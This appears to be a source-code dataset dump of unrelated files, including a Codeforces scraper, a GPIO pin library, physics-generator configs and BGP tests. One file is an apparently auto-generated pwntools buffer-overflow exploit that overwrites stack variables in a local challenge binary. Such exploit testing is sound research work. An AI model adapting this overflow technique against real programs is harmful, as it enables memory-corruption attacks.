msg_yes %= (self.username,)
msg_no = ('User "%s" is NOT logged into the application, the'
' `check_string` was not found in the HTTP response'
' with ID %s.')
msg_no %= (self.username, http_response.id)
msg = msg_yes if logged_in else msg_no
self._log_debug(msg)
return logged_in
def _get_data_from_format(self):
"""
:return: A string with all the information to send to the login URL.
This string contains the username, password, and all the other
information that was provided by the user and needs to be transmitted to
the remote web application.
"""
trans = quote_plus if self.url_encode_params else lambda x: x
result = self.data_format
result = result.replace('%u', trans(self.username_field))
result = result.replace('%U', trans(self.username))
result = result.replace('%p', trans(self.password_field))
result = result.replace('%P', trans(self.password))
return result
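    # Illustrative note: with the default data_format '%u=%U&%p=%P' and
    # hypothetical settings username_field='user', username='admin',
    # password_field='pwd', password='s3cret', the method above yields the
    # request body 'user=admin&pwd=s3cret' (each piece URL-encoded when
    # url_encode_params is True).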
def _get_main_authentication_url(self):
return self.auth_url
def get_options(self):
"""
:return: A list of option objects for this plugin.
"""
options = [
('username',
self.username,
'string',
'Username for using in the authentication process'),
('password',
self.password,
'string',
'Password for using in the authentication process'),
('username_field',
self.username_field,
'string', 'Username parameter name (ie. "uname" if the HTML looks'
' like <input type="text" name="uname">...)'),
('password_field',
self.password_field,
'string', 'Password parameter name (ie. "pwd" if the HTML looks'
' like <input type="password" name="pwd">...)'),
('auth_url',
self.auth_url,
'url',
'URL where the username and password will be sent using the'
' configured request method'),
('check_url',
self.check_url,
'url',
'URL used to verify if the session is still active by looking for'
' the check_string.'),
('check_string',
self.check_string,
'string',
'String for searching on check_url page to determine if the'
'current session is active.'),
('data_format',
self.data_format,
'string',
'The format for the POST-data or query string. The following are'
' valid formatting values:\n'
' - %u for the username parameter name value\n'
' - %U for the username value\n'
' - %p for the password parameter name value\n'
' - %P for the password value\n'),
('follow_redirects',
self.follow_redirects,
'boolean',
'Follow HTTP redirects in multi-stage authentication flows'),
('method',
self.method,
'string',
'The HTTP method to use'),
('url_encode_params',
self.url_encode_params,
'boolean',
'URL-encode configured parameters before applying them to the'
'"data_format".'),
]
ol = OptionList()
for o in options:
ol.add(opt_factory(o[0], o[1], o[3], o[2], help=o[3]))
return ol
def set_options(self, options_list):
"""
This method sets all the options that are configured using
the user interface generated by the framework using
the result of get_options().
:param options_list: A dict with the options for the plugin.
:return: No value is returned.
"""
self.username = options_list['username'].get_value()
self.password = options_list['password'].get_value()
self.username_field = options_list['username_field'].get_value()
self.password_field = options_list['password_field'].get_value()
self.data_format = options_list['data_format'].get_value()
self.check_string = options_list['check_string'].get_value()
self.method = options_list['method'].get_value()
self.auth_url = options_list['auth_url'].get_value()
self.check_url = options_list['check_url'].get_value()
self.follow_redirects = options_list['follow_redirects'].get_value()
self.url_encode_params = options_list['url_encode_params'].get_value()
missing_options = []
for o in options_list:
if o.get_value() == '':
missing_options.append(o.get_name())
if missing_options:
msg = ("All parameters are required and can't be empty. The"
" missing parameters are %s")
raise BaseFrameworkException(msg % ', '.join(missing_options))
def get_long_desc(self):
"""
:return: A DETAILED description of the plugin functions and features.
"""
return """
This authentication plugin can login to web applications with more
complex authentication schemas where the auth.generic plugin falls
short.
These configurable parameters exist:
- username
- password
- username_field
- password_field
- data_format
- auth_url
- method
- check_url
- check_string
- follow_redirects
Detailed descriptions for each configurable parameter are available in
the plugin configuration menu.
""" | [
"[email protected]"
] | |
b2a5716e29cbd359293a072d81733438f86495a2 | 52e45c26c110c42de79383e8034fd280fd82a02f | /spatialdata/spatialdb/GravityField.py | 13f3d151d4951e63b963de4d5d79d09bf78493dc | [
"MIT"
] | permissive | geodynamics/spatialdata | 1ae1d2583aae356e9e68cd434c1f17820b49d127 | 2da6aad61c136f0e15f066aaea5fd31851de112f | refs/heads/main | 2023-08-15T07:22:17.676228 | 2023-07-28T03:32:07 | 2023-07-28T03:32:07 | 12,651,854 | 6 | 20 | MIT | 2023-07-28T03:32:09 | 2013-09-06T18:52:14 | C++ | UTF-8 | Python | false | false | 2,821 | py | # ----------------------------------------------------------------------
#
# Brad T. Aagaard, U.S. Geological Survey
#
# This code was developed as part of the Computational Infrastructure
# for Geodynamics (http://geodynamics.org).
#
# Copyright (c) 2010-2023 University of California, Davis
#
# See LICENSE.md for license information.
#
# ----------------------------------------------------------------------
from .SpatialDBObj import SpatialDBObj
from .spatialdb import GravityField as ModuleGravityField
class GravityField(SpatialDBObj, ModuleGravityField):
"""
Spatial database with gravity field information.
Implements `SpatialDB`.
"""
DOC_CONFIG = {
"cfg": """
# Specify a gravity field in 2D with gravity in the -y direction.
[gravity_field]
gravity_dir = [0, -1]
acceleration = 9.80665*meter/second**2
""",
}
import pythia.pyre.inventory
gravityDir = pythia.pyre.inventory.list("gravity_dir", default=[0.0, 0.0, -1.0])
gravityDir.meta['tip'] = "Direction of gravitational body force. " \
"(used only with a Cartesian coordinate system."
from pythia.pyre.units.length import meter
from pythia.pyre.units.time import second
acceleration = pythia.pyre.inventory.dimensional("acceleration",
default=9.80665 * meter / second**2)
acceleration.meta['tip'] = "Gravitational acceleration."
def __init__(self, name="gravityfield"):
"""
Constructor.
"""
SpatialDBObj.__init__(self, name)
return
def _defaults(self):
self.description = "Gravity field"
def _configure(self):
"""
Set members based on inventory.
"""
SpatialDBObj._configure(self)
self._validateParameters(self.inventory)
dir = list(map(float, self.gravityDir))
ModuleGravityField.setGravityDir(self, dir[0], dir[1], dir[2])
ModuleGravityField.setGravityAcc(self, self.acceleration.value)
def _createModuleObj(self):
"""
Create Python module object.
"""
ModuleGravityField.__init__(self)
def _validateParameters(self, params):
"""
Validate parameters.
"""
if (len(params.gravityDir) != 3):
raise ValueError("Gravity direction must be a 3 component list or tuple.")
try:
dirFloat = list(map(float, params.gravityDir))
except:
raise ValueError("Gravity direction must contain floating point values.")
# FACTORIES ////////////////////////////////////////////////////////////
def spatial_database():
"""
Factory associated with GravityField.
"""
return GravityField()
# End of file
| [
"[email protected]"
] | |
6881aba7454b96576813d8e61f3828f6399b7b00 | 0fccee4c738449f5e0a8f52ea5acabf51db0e910 | /genfragments/ThirteenTeV/XXTo4J/XXTo4J_M-50_CTau-1000mm_TuneCUETP8M1_13TeV_pythia8_cff.py | f20e41d229265892646774f2207a200192607813 | [] | no_license | cms-sw/genproductions | f308ffaf3586c19b29853db40e6d662e937940ff | dd3d3a3826343d4f75ec36b4662b6e9ff1f270f4 | refs/heads/master | 2023-08-30T17:26:02.581596 | 2023-08-29T14:53:43 | 2023-08-29T14:53:43 | 11,424,867 | 69 | 987 | null | 2023-09-14T12:41:28 | 2013-07-15T14:18:33 | Python | UTF-8 | Python | false | false | 2,894 | py | COM_ENERGY = 13000. # GeV
MASS_POINT = 50 # GeV
CROSS_SECTION = 1 # pb
CTAU_POINT = 1000 # mm
import FWCore.ParameterSet.Config as cms
from Configuration.Generator.Pythia8CommonSettings_cfi import *
from Configuration.Generator.Pythia8CUEP8M1Settings_cfi import *
generator = cms.EDFilter("Pythia8GeneratorFilter",
pythiaPylistVerbosity = cms.untracked.int32(0),
filterEfficiency = cms.untracked.double(1),
pythiaHepMCVerbosity = cms.untracked.bool(False),
comEnergy = cms.double(COM_ENERGY),
crossSection = cms.untracked.double(CROSS_SECTION),
maxEventsToPrint = cms.untracked.int32(0),
PythiaParameters = cms.PSet(
pythia8CommonSettingsBlock,
pythia8CUEP8M1SettingsBlock,
processParameters = cms.vstring(
"Higgs:useBSM = on",
"HiggsBSM:all = off",
"HiggsBSM:ffbar2A3H2 = on",
"35:m0 = %s" % MASS_POINT,
"36:m0 = %s" % MASS_POINT,
"35:tau0 = %s" % CTAU_POINT,
"36:tau0 = %s" % CTAU_POINT,
"35:0:bRatio = .2",
"35:1:bRatio = .2",
"35:2:bRatio = .2",
"35:3:bRatio = .2",
"35:4:bRatio = .2",
"35:5:bRatio = 0",
"35:9:bRatio = 0",
"35:10:bRatio= 0",
"36:0:bRatio = .2",
"36:1:bRatio = .2",
"36:2:bRatio = .2",
"36:3:bRatio = .2",
"36:4:bRatio = .2",
"36:5:bRatio = 0",
"36:9:bRatio = 0",
"36:10:bRatio = 0",
"35:0:meMode = 100",
"35:1:meMode = 100",
"35:2:meMode = 100",
"35:3:meMode = 100",
"35:4:meMode = 100",
"35:5:meMode = 100",
"35:9:meMode = 100",
"35:10:meMode = 100",
"36:0:meMode = 100",
"36:1:meMode = 100",
"36:2:meMode = 100",
"36:3:meMode = 100",
"36:4:meMode = 100",
"36:5:meMode = 100",
"36:9:meMode = 100",
"36:10:meMode = 100",
"HiggsA3:coup2d = 1",
"HiggsA3:coup2u = 1",
"HiggsA3:coup2H1Z = 0",
"HiggsA3:coup2H2Z = 1",
"HiggsA3:coup2l = 0",
"HiggsA3:coup2HchgW = 0",
"HiggsH2:coup2d = 1",
"HiggsH2:coup2u = 1",
"HiggsH2:coup2l = 0",
"HiggsH2:coup2Z = 0",
"HiggsH2:coup2W = 0",
"HiggsH2:coup2H1H1 = 0",
"HiggsH2:coup2A3A3 = 0",
"35:onMode = off",
"35:onIfAny = 1 2 3 4 5",
"36:onMode = off",
"36:onIfAny = 1 2 3 4 5",
),
parameterSets = cms.vstring(
'pythia8CommonSettings',
'pythia8CUEP8M1Settings',
'processParameters'
)
)
)
ProductionFilterSequence = cms.Sequence(generator)
| [
"[email protected]"
] | |
a31d45fd9b74a17216e283571c46b257948e4c6a | 589d9fa803abec59a8375b925d7ec51d345fc227 | /coolkit/lib/Contest.py | 90ccd8a06e5c6881eaa6cc858f4378e4cb14c919 | [
"MIT"
] | permissive | kishorerabha/CoolKit | aff2d969cc7dbd4fce86b5b478979e8b7460790d | d411822b29dfbabdaaeab844716767810f3b1e25 | refs/heads/master | 2020-03-31T04:54:49.984680 | 2018-10-06T01:26:47 | 2018-10-06T11:06:01 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 11,679 | py | #!/usr/bin/env python3
import os
import sys
try:
import shutil
import grequests as grq
from terminaltables import AsciiTable
from bs4 import BeautifulSoup
except:
err = """
You haven't installed the required dependencies.
"""
import sys, traceback
traceback.print_exc()
print(err)
sys.exit(0)
from .Colour import Colour
from .Constants import Const
from .files import verify_folder, verify_file
from .Problem import Problem
from .Soup import Soup
from .srbjson import srbjson
from .utils import utils
class Contest:
def __init__(self,c_name,c_type='contest',c_title=''):
# trivially cached
self.c_name = str(c_name)
self.c_type = c_type
# fetchable variables
self.announce_arr = []
self.c_title = c_title
self.hash = ""
self.is_good = False # loaded fully or not
self.num_prob = -1
self.p_name_list = []
# non cached
self.dir = Const.cache_dir + '/' + self.c_type + '/' + self.c_name
self.link = "https://codeforces.com/"+self.c_type+"/"+self.c_name
self.prob_mapp = {}
srbjson.dump_data({
"c_name":self.c_name,
"c_type":self.c_type
},
self.dir+ "/config",
srbjson.contest_template)
self._load_contest() # pick cached data
# haven't called fetch_contest from constructor as it may be slow
# call it seperately, its safe as it wont refetch things if loaded
def pull_contest(self,force=False):
self.fetch_contest(force)
self.dump_contest()
def fetch_contest(self,force=False):
'''
do fetching and dumping both
'''
if(force): # remove every detail regarding that contest
shutil.rmtree(self.dir)
self._load_contest()
self.prob_mapp = {}
if(self.is_good): # return if cached
return
'''
by now there is no useless folder and map entry
'''
self._fetch_contest_home()
if (len(self.prob_mapp) == 0):
print(Colour.RED+'failed to fetch contest home'+Colour.END)
return
'''
by now there are only and all folders on all problems in contest
and those folders are only and all mapped into prob_mapp
missing entries are added by _fetch_contest_home()
they might be bad or good depending on they are newly created or old ones respectively
'''
failed_links = []
for key in self.p_name_list:
if(not self.prob_mapp[key].is_good):
failed_links.append(self.prob_mapp[key].link)
'''
only and only links to bad problems, empty folders exists for all
'''
tries = 1
while(len(failed_links) > 0 and tries <= 2):
print(Colour.YELLOW + str(tries)+': try to fetch problems' + Colour.END)
failed_links = self._fetch_prob_test_cases(failed_links)
tries += 1
if(len(failed_links) > 0):
for a in failed_links:
print(Colour.RED + 'failed to fetch ' + a + Colour.END)
self.is_good = False
else:
self.is_good = True
def dump_contest(self):
srbjson.dump_data({
"ann_arr":self.announce_arr,
"c_title":self.c_title,
"is_good":self.is_good,
"num_prob":self.num_prob,
"p_name_list":self.p_name_list
},
self.dir+ "/config",
srbjson.contest_template)
def _fetch_prob_test_cases(self,links):
"""
Method to download prob_test_cases for all problems
"""
p_names = [ link.split('/')[-1] for link in links ]
print(Colour.YELLOW + 'fetching problems ... ' + Colour.PURPLE, p_names, Colour.END)
rs = (grq.get(link) for link in links)
responses = grq.map(rs)
failed_requests = []
for response in responses:
if response is not None and response.status_code == 200:
soup = BeautifulSoup(response.text, 'html.parser')
p_name = response.url.split('/')[-1]
self.prob_mapp[p_name].load_from_soup(soup)
if(not self.prob_mapp[p_name].is_good):
                    failed_requests += [response.url]
continue
self.prob_mapp[p_name].dump_problem()
else:
failed_requests += [response.url]
return failed_requests
def _load_contest(self):
'''
loads contest from cache if exists else create an empty contest and loads it up
also cleans useless folders in prob folder if they aren't in config of p_name_list
'''
data = srbjson.extract_data(self.dir+'/config',srbjson.contest_template)
self.announce_arr = data['ann_arr']
self.c_title = data['c_title']
self.hash = data['hash']
self.is_good = data['is_good']
self.num_prob = data['num_prob']
self.p_name_list = data['p_name_list']
# problems
path = self.dir + '/prob/'
verify_folder(path)
good_probs = 0
prob_dir_list = [ (a if os.path.isdir(path+a) else None) for a in os.listdir(path)]
prob_dirs = []
for prob in prob_dir_list: # keep only folders
if(prob): prob_dirs += [prob]
for a in prob_dirs:
self.prob_mapp[a] = Problem(a,self.c_name,self.c_type)
if(self.prob_mapp[a].is_good and a in self.p_name_list): # remove waste folders
good_probs += 1
else:
print(Colour.RED+'Removed Bad Problem : '+a+Colour.END)
shutil.rmtree(self.prob_mapp[a].dir)
del self.prob_mapp[a]
if(self.num_prob == -1):
print(Colour.YELLOW+'Contest not configured yet'+Colour.END)
self.is_good = False
elif(good_probs != self.num_prob):
print(Colour.YELLOW+'expected',self.num_prob,'probs got',good_probs,'good probs',Colour.END)
self.is_good = False
def display_contest(self):
table_data = [[Colour.BOLD+Colour.GREEN+self.c_title+Colour.END]]
print(AsciiTable(table_data).table)
table_data = [['#','Name','submissions','Link']]
for prob in self.prob_mapp.values():
table_data.append([prob.p_name,prob.p_title,prob.subm,prob.link])
print(AsciiTable(table_data).table)
table_data = [['S no','Announcements']]
for a,ann in enumerate(self.announce_arr):
table_data.append([a+1,utils.shrink(ann,max_len=80)])
print(AsciiTable(table_data).table)
def _fetch_contest_home(self):
'''
tries to fetch these things and also dump them if fetched
contest:
ann_arr
c_title
prob_mapp
num_prob
p_name_list
problem:
p_title
subm
CAN BE CALLED TO FORCEFULLY UPDATE DATA, say subm during the contest
'''
soup = Soup.get_soup("https://codeforces.com/"+self.c_type+"/"+self.c_name)
if(soup is None):
return
# title
rtable = soup.findAll('table',{'class':'rtable'})[0]
self.c_title = rtable.findAll('a')[0].get_text().strip()
# prob table
prob_table = soup.findAll('table',{'class':'problems'})[0]
prob_list = prob_table.findAll('tr')[1:]
p_name_list = []
for problem in prob_list:
p_name = problem.findAll('td')[0].get_text().strip()
p_name_list.append(p_name)
p_title = problem.findAll('td')[1].findAll('a')[0].get_text().strip()
subm = problem.findAll('td')[3].get_text().strip().split('x')[-1]
if(not p_name in self.prob_mapp.keys()):
self.prob_mapp[p_name] = Problem(p_name,self.c_name,self.c_type,p_title)
self.prob_mapp[p_name].p_title = p_title
self.prob_mapp[p_name].subm = subm
self.num_prob = len(self.prob_mapp)
self.p_name_list = p_name_list
# announcements
atable = soup.findAll('table',{'class':'problem-questions-table'})[0]
announce_arr = atable.findAll('tr')[1:]
for ann in announce_arr:
ann = ann.findAll('td')[-1].get_text().strip()
self.announce_arr += [ann]
@staticmethod
def upcoming_contest(display=False):
url = "http://codeforces.com/contests"
soup = Soup.get_soup(url)
contests = [['id','title','','time','dur.','link']]
if(soup is None):
print(Colour.RED+'unable to fetch upcoming contests list'+Colour.END)
return contests
datatable = soup.find_all('div',{'class':'datatable'})[0].find_all('table')[0]
contest_rows = datatable.find_all('tr')[1:]
for row in contest_rows:
c_name = row['data-contestid']
c_type = 'contests'
data = row.find_all('td')
title = data[0].get_text().strip()
title = Contest.get_short_contest_title(title)
title = utils.shrink(title)
writer = data[1].get_text().strip()
time = data[2].get_text().strip()
time = Contest.get_formatted_time(time)
duration = data[3].get_text().strip()
link = "www.codeforces.com/"+c_type+"/"+c_name
contests.append([c_name,title,writer,time,duration,link])
if(display is True): print(AsciiTable(contests).table)
return contests
@staticmethod
def get_number_of_problems(c_name,c_type='contest',cacheing=False):
# TODO implementing caching else it is slow
url = "https://codeforces.com/"+c_type+"/"+c_name
soup = Soup.get_soup(url)
if(soup is None):
return "-",[]
prob_table = soup.findAll('table',{'class':'problems'})[0]
prob_list = prob_table.findAll('tr')[1:]
p_name_list = []
for problem in prob_list:
p_name = problem.findAll('td')[0].get_text().strip()
p_name_list += [p_name]
return str(len(prob_list)) , p_name_list
@staticmethod
def get_short_contest_title(title):
title = title.replace("Codeforces","CF")
title = title.replace("Educational","EDU")
title = title.replace("Elimination","ELM")
title = title.replace("Rated","R")
title = title.replace("rated","R")
title = title.replace("Round","RnD")
title = title.replace("round","RnD")
title = title.replace("Div. 3","D3")
title = title.replace("Div. 2","D2")
title = title.replace("Div. 1","D1")
title = title.replace("div. 3","D3")
title = title.replace("div. 2","D2")
title = title.replace("div. 1","D1")
return title
@staticmethod
def get_formatted_time(time,offset = '03:00'):
date,time = time.split()
month,date = date.split('/')[:-1]
date = int(date)
hour,mins = time.split(':')
hour = int(hour)
mins = int(mins)
off_h,off_m = offset.split(':')
off_h = int(off_h)
off_m = int(off_m)
mins = mins + off_m
if(mins >= 60):
mins -= 60
hour += 1
hour = hour + off_h
if(hour >= 24):
hour -= 24
date +=1
return str(date).zfill(2) + '-' + month + ' ' + str(hour).zfill(2) + ':' + str(mins).zfill(2)
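        # Worked example: with the default offset '03:00',
        # get_formatted_time('12/25/2018 17:35') keeps month '12' and day 25,
        # shifts 17:35 by +3:00 and returns '25-12 20:35'.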
| [
"[email protected]"
] | |
a445d7c740160a7e33848149248180741d45af83 | 077a17b286bdd6c427c325f196eb6e16b30c257e | /00_BofVar-unit-tests/07_32/remenissions-work/exploit-BofVar-3.py | b8ea6ed45800852876c676f658926951160fa819 | [] | no_license | KurSh/remenissions_test | 626daf6e923459b44b82521aa4cb944aad0dbced | 9dec8085b62a446f7562adfeccf70f8bfcdbb738 | refs/heads/master | 2023-07-08T20:25:04.823318 | 2020-10-05T06:45:16 | 2020-10-05T06:45:16 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 777 | py | from pwn import *
import time
import sys
import signal
import sf
target = process("./chall-test_BofVar-07-x86")
gdb.attach(target, execute="verify_exploit")
bof_payload = sf.BufferOverflow(arch=32)
bof_payload.set_input_start(0x5a)
bof_payload.add_int32(0x28, 0xdead)
bof_payload.add_int32(0x24, 0xdead)
bof_payload.add_int32(0x20, 0xdeae)
payload = bof_payload.generate_payload()
target.sendline(payload)
# Exploit Verification starts here 15935728
def handler(signum, frame):
raise Exception("Timed out")
def check_verification_done():
while True:
if os.path.exists("pwned") or os.path.exists("rip"):
sys.exit(0)
signal.signal(signal.SIGALRM, handler)
signal.alarm(2)
try:
while True:
check_verification_done()
except Exception:
print("Exploit timed out")
| [
"[email protected]"
] | |
f69ce16005e44fc509989b7f6e007b21ae1b0ae5 | ff7e133648566b8a705cb5a214be8a82df5101d9 | /algorithm/work_1/test.py | a15a7f356574f4bf7509cf40eb11373a9185fc38 | [] | no_license | hoik92/Algorithm | 231433193ecba4a48ef830cab2c5b0115fa7246d | 4085b83a692a211e10503949d4518205d404dcaf | refs/heads/master | 2020-04-27T06:27:06.777255 | 2019-04-18T23:48:30 | 2019-04-18T23:48:30 | 174,108,507 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 657 | py | import sys
sys.stdin = open('input.txt', 'r')
def mx_mn(T):
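    # return the indices of the largest and smallest elements of T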
mxidx, mnidx = 0, 0
for i in range(len(T)):
if T[mxidx] < T[i]:
mxidx = i
if T[mnidx] > T[i]:
mnidx = i
return mxidx, mnidx
for tc in range(1, 11):
D = int(input())
T = list(map(int, input().split()))
for x in range(D):
mxidx, mnidx = mx_mn(T)
T[mxidx] -= 1
T[mnidx] += 1
mxidx, mnidx = mx_mn(T)
print(f"#{tc} {T[mxidx] - T[mnidx]}")
# for x in range(D):
# T[T.index(max(T))] -= 1
# T[T.index(min(T))] += 1
# print(f"#{tc} {max(T) - min(T)}") | [
"[email protected]"
] | |
e529eec44443a0babb5409cc279d28f8501b184d | c549044b12e835827258d693f21e91cc614b303e | /venv/lib/python3.8/site-packages/gpiozero/pins/rpigpio.py | 8a085c8302e2d43241f444f2e47b8d5b6cb54bab | [] | no_license | Abbalon/PiHome-SmartLock | 5484038f87199bf9d341485507474a7c5c8f1519 | 9ad6f04e8da327cc26c51b177a9ce252d7eabac9 | refs/heads/master | 2022-12-14T08:40:07.706787 | 2020-09-13T17:43:18 | 2020-09-13T17:43:18 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 8,757 | py | # GPIO Zero: a library for controlling the Raspberry Pi's GPIO pins
# Copyright (c) 2015-2019 Dave Jones <[email protected]>
# Copyright (c) 2016 Andrew Scheller <[email protected]>
#
# Redistribution and use in source and binary forms, with or without
# modification, are permitted provided that the following conditions are met:
#
# * Redistributions of source code must retain the above copyright notice,
# this list of conditions and the following disclaimer.
#
# * Redistributions in binary form must reproduce the above copyright notice,
# this list of conditions and the following disclaimer in the documentation
# and/or other materials provided with the distribution.
#
# * Neither the name of the copyright holder nor the names of its contributors
# may be used to endorse or promote products derived from this software
# without specific prior written permission.
#
# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS"
# AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE
# IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE
# ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT HOLDER OR CONTRIBUTORS BE
# LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR
# CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF
# SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS
# INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN
# CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE)
# ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE
# POSSIBILITY OF SUCH DAMAGE.
from __future__ import (
unicode_literals,
absolute_import,
print_function,
division,
)
str = type('')
from RPi import GPIO
from .local import LocalPiFactory, LocalPiPin
from ..exc import (
PinInvalidFunction,
PinSetInput,
PinFixedPull,
PinInvalidPull,
PinInvalidState,
PinInvalidBounce,
PinPWMFixedValue,
)
class RPiGPIOFactory(LocalPiFactory):
"""
Extends :class:`~gpiozero.pins.local.LocalPiFactory`. Uses the `RPi.GPIO`_
library to interface to the Pi's GPIO pins. This is the default pin
implementation if the RPi.GPIO library is installed. Supports all features
including PWM (via software).
Because this is the default pin implementation you can use it simply by
specifying an integer number for the pin in most operations, e.g.::
from gpiozero import LED
led = LED(12)
However, you can also construct RPi.GPIO pins manually if you wish::
from gpiozero.pins.rpigpio import RPiGPIOFactory
from gpiozero import LED
factory = RPiGPIOFactory()
led = LED(12, pin_factory=factory)
.. _RPi.GPIO: https://pypi.python.org/pypi/RPi.GPIO
"""
def __init__(self):
super(RPiGPIOFactory, self).__init__()
GPIO.setmode(GPIO.BCM)
GPIO.setwarnings(False)
self.pin_class = RPiGPIOPin
def close(self):
super(RPiGPIOFactory, self).close()
GPIO.cleanup()
class RPiGPIOPin(LocalPiPin):
"""
Extends :class:`~gpiozero.pins.local.LocalPiPin`. Pin implementation for
the `RPi.GPIO`_ library. See :class:`RPiGPIOFactory` for more information.
.. _RPi.GPIO: https://pypi.python.org/pypi/RPi.GPIO
"""
GPIO_FUNCTIONS = {
'input': GPIO.IN,
'output': GPIO.OUT,
'i2c': GPIO.I2C,
'spi': GPIO.SPI,
'pwm': GPIO.HARD_PWM,
'serial': GPIO.SERIAL,
'unknown': GPIO.UNKNOWN,
}
GPIO_PULL_UPS = {
'up': GPIO.PUD_UP,
'down': GPIO.PUD_DOWN,
'floating': GPIO.PUD_OFF,
}
GPIO_EDGES = {
'both': GPIO.BOTH,
'rising': GPIO.RISING,
'falling': GPIO.FALLING,
}
GPIO_FUNCTION_NAMES = {v: k for (k, v) in GPIO_FUNCTIONS.items()}
GPIO_PULL_UP_NAMES = {v: k for (k, v) in GPIO_PULL_UPS.items()}
GPIO_EDGES_NAMES = {v: k for (k, v) in GPIO_EDGES.items()}
def __init__(self, factory, number):
super(RPiGPIOPin, self).__init__(factory, number)
self._pull = 'up' if self.factory.pi_info.pulled_up(repr(self)) else 'floating'
self._pwm = None
self._frequency = None
self._duty_cycle = None
self._bounce = -666
self._edges = GPIO.BOTH
GPIO.setup(self.number, GPIO.IN, self.GPIO_PULL_UPS[self._pull])
def close(self):
self.frequency = None
self.when_changed = None
GPIO.cleanup(self.number)
def output_with_state(self, state):
self._pull = 'floating'
GPIO.setup(self.number, GPIO.OUT, initial=state)
def input_with_pull(self, pull):
if pull != 'up' and self.factory.pi_info.pulled_up(repr(self)):
raise PinFixedPull('%r has a physical pull-up resistor' % self)
try:
GPIO.setup(self.number, GPIO.IN, self.GPIO_PULL_UPS[pull])
self._pull = pull
except KeyError:
raise PinInvalidPull('invalid pull "%s" for pin %r' % (pull, self))
def _get_function(self):
return self.GPIO_FUNCTION_NAMES[GPIO.gpio_function(self.number)]
def _set_function(self, value):
if value != 'input':
self._pull = 'floating'
if value in ('input', 'output') and value in self.GPIO_FUNCTIONS:
GPIO.setup(self.number, self.GPIO_FUNCTIONS[value], self.GPIO_PULL_UPS[self._pull])
else:
raise PinInvalidFunction('invalid function "%s" for pin %r' % (value, self))
def _get_state(self):
if self._pwm:
return self._duty_cycle
else:
return GPIO.input(self.number)
def _set_state(self, value):
if self._pwm:
try:
self._pwm.ChangeDutyCycle(value * 100)
except ValueError:
raise PinInvalidState('invalid state "%s" for pin %r' % (value, self))
self._duty_cycle = value
else:
try:
GPIO.output(self.number, value)
except ValueError:
raise PinInvalidState('invalid state "%s" for pin %r' % (value, self))
except RuntimeError:
raise PinSetInput('cannot set state of pin %r' % self)
def _get_pull(self):
return self._pull
def _set_pull(self, value):
if self.function != 'input':
raise PinFixedPull('cannot set pull on non-input pin %r' % self)
if value != 'up' and self.factory.pi_info.pulled_up(repr(self)):
raise PinFixedPull('%r has a physical pull-up resistor' % self)
try:
GPIO.setup(self.number, GPIO.IN, self.GPIO_PULL_UPS[value])
self._pull = value
except KeyError:
raise PinInvalidPull('invalid pull "%s" for pin %r' % (value, self))
def _get_frequency(self):
return self._frequency
def _set_frequency(self, value):
if self._frequency is None and value is not None:
try:
self._pwm = GPIO.PWM(self.number, value)
except RuntimeError:
raise PinPWMFixedValue('cannot start PWM on pin %r' % self)
self._pwm.start(0)
self._duty_cycle = 0
self._frequency = value
elif self._frequency is not None and value is not None:
self._pwm.ChangeFrequency(value)
self._frequency = value
elif self._frequency is not None and value is None:
self._pwm.stop()
self._pwm = None
self._duty_cycle = None
self._frequency = None
def _get_bounce(self):
return None if self._bounce == -666 else (self._bounce / 1000)
def _set_bounce(self, value):
if value is not None and value < 0:
raise PinInvalidBounce('bounce must be 0 or greater')
f = self.when_changed
self.when_changed = None
try:
self._bounce = -666 if value is None else int(value * 1000)
finally:
self.when_changed = f
def _get_edges(self):
return self.GPIO_EDGES_NAMES[self._edges]
def _set_edges(self, value):
f = self.when_changed
self.when_changed = None
try:
self._edges = self.GPIO_EDGES[value]
finally:
self.when_changed = f
def _call_when_changed(self, channel):
super(RPiGPIOPin, self)._call_when_changed()
def _enable_event_detect(self):
GPIO.add_event_detect(
self.number, self._edges,
callback=self._call_when_changed,
bouncetime=self._bounce)
def _disable_event_detect(self):
GPIO.remove_event_detect(self.number)
| [
"[email protected]"
] | |
0c233a30fd722986b1ae834d7faed0df4ed8cd18 | a40d2a4c1704c080b0454805218b7dd07f28218c | /yabgp/tests/unit/message/attribute/test_extcommunity.py | bb67218e7535e1898aafbbbca3858bf10dd9a231 | [
"Apache-2.0"
] | permissive | plucena24/yabgp | e524b2c58b262ddba868a93cbbab3c5a6f3419aa | bc817ed74b21743797faee565fe54efb1f4b85c7 | refs/heads/master | 2023-08-21T02:19:20.937686 | 2015-08-04T09:30:49 | 2015-08-04T09:30:49 | 40,301,596 | 0 | 0 | Apache-2.0 | 2023-08-14T21:29:51 | 2015-08-06T11:35:33 | Python | UTF-8 | Python | false | false | 4,466 | py | # Copyright 2015 Cisco Systems, Inc.
# All rights reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
""" Test extended Community attribute """
import unittest
from yabgp.common import constants as bgp_cons
from yabgp.common import exception as excep
from yabgp.message.attribute.extcommunity import ExtCommunity
class TestExtCommunity(unittest.TestCase):
def test_parse_rt0(self):
# Route Target,Format AS(2bytes):AN(4bytes)
ext_community = ExtCommunity.parse(value=b'\x00\x02\x00\x64\x00\x00\x00\x0c')
